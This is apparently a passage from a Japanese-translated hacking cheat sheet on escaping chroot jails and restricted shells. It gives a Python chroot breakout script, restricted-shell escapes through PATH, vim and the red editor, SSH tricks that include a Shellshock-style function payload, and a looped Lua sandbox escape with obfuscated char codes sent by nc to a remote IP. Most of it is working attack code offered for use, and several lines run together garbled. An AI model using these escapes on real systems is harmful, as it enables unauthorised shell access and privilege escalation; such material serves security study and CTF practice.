```python #!/usr/bin/python import os os.mkdir("chroot-dir") os.chroot("chroot-dir") for i in range(1000): os.chdir("..") os.chroot(".") os.system("/bin/bash") ```
echo $PATH #See the path of the executables that you can usePATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin#Try to change the pathecho/home/*#List directory
vimの使用
:setshell=/bin/sh:shell
スクリプトの作成
実行可能なファイルを /bin/bash の内容で作成できるか確認してください
red/bin/bash> w wx/path #Write /bin/bash in a writable and executable path
SSHからbashを取得する
ssh経由でアクセスしている場合、このトリックを使用してbashシェルを実行できます:
ssh-tuser@<IP>bash# Get directly an interactive shellsshuser@<IP>-t"bash --noprofile -i"sshuser@<IP>-t"() { :; }; sh -i "
#In this scenario you could BF the victim that is generating a new lua environment#for every interaction with the following line and when you are lucky#the char function is going to be executedfor k,chr in pairs(string) doprint(chr(0x6f,0x73,0x2e,0x65,0x78)) end#This attack from a CTF can be used to try to chain the function execute from "os" library#and "char" from string library, and the use both to execute a commandfor i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done